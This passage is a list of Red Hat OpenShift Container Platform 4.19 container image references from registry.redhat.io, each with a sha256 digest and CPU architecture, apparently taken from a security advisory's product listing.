"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
